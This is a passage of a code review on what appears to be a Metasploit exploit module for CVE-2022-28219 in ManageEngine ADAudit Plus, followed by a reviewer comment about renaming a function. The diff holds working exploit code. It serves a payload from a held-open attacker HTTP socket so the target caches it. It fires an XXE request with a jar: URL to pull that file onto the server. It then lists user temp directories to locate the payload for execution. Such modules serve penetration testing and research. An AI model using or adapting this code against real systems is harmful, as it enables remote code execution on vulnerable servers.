modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb

```diff
@@ -0,0 +1,365 @@
+      return nil
+    end
+
+    print_warning("FTP client connected, but we did not receive file list: #{ftp_data}")
+    return nil
+  end
+
+  def search_for_payloads(users)
+    return users.map do |u|
+      dir = "/users/#{u}/appdata/local/temp"
+      # This will search for the payload, but right now just print stuff
+      listing = get_directory_listing(dir)
+      if !listing
+        print_warning("Couldn't get directory listing for #{dir}")
+        next []
+      end
+
+      listing
+           .select { |f| f =~ /^jar_cache[0-9]+.tmp$/ }
+           .map { |f| File.join(dir, f) }
+    end.flatten
+  end
+
+  def upload_payload(payload)
+    t = Thread.new do
+      c = nil
+      begin
+        # We use a TCP socket here so we can hold the socket open after the HTTP
+        # conversation has concluded. That way, the server caches the file in
+        # the user's temp folder while it waits for more data
+        http_server = Rex::Socket::TcpServer.create(
+          'LocalPort' => datastore['SRVPORT_HTTP2'],
+          'LocalHost' => srv_host,
+          'Context' => {
+            'Msf' => framework,
+            'MsfExploit' => self
+          }
+        )
+
+        # Receive and discard the HTTP request
+        c = http_server.accept
+        c.recv(1024)
+        c.print "HTTP/1.1 200 OK\r\n"
+        c.print "Connection: keep-alive\r\n"
+        c.print "\r\n"
+        c.print payload
+
+        # This has to stay open as long as it takes to enumerate all users'
+        # directories to find then execute the payload. ~5 seconds works on
+        # a single-user system, but I increased this a lot for production.
+        # (This thread should be killed when the exploit completes in any case)
+        Rex.sleep(60)
+      ensure
+        http_server.close
+        if c
+          c.close
+        end
+      end
+    end
+
+    # Trigger the XXE to get file listings
+    path = "/#{rand_text_alpha(rand(8..15))}.jar!/file.txt"
+    full_url = "http://#{srv_host}:#{datastore['SRVPORT_HTTP2']}#{path}"
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,
+      'ctype' => 'application/json',
+      'data' => encode_xml("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % xxe SYSTEM \"jar:#{full_url}\"> %xxe;]>")
+    )
+
+    if res.code != 200
+      fail_with(Failure::Unknown, "XXE request to upload payload failed with HTTP/#{res.code}")
+    end
+
+    return t
+  end
+
+  def serve_http_file(path, respond_with = '')
+    # do not use SSL for the attacking web server
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+
+    start_service({
+      'Uri' => {
+        'Proc' => proc do |cli, _req|
+          send_response(cli, respond_with)
+        end,
+        'Path' => path
+      }
+    })
+
+    datastore['SSL'] = true if ssl_restore
+  end
+
+  def encode_xml(xml_payload)
```

Comment:
Looks like this isn't encoding xml, it's just wrapping it in an API structure? 👀 

Potentially we could rename this to describe the intent better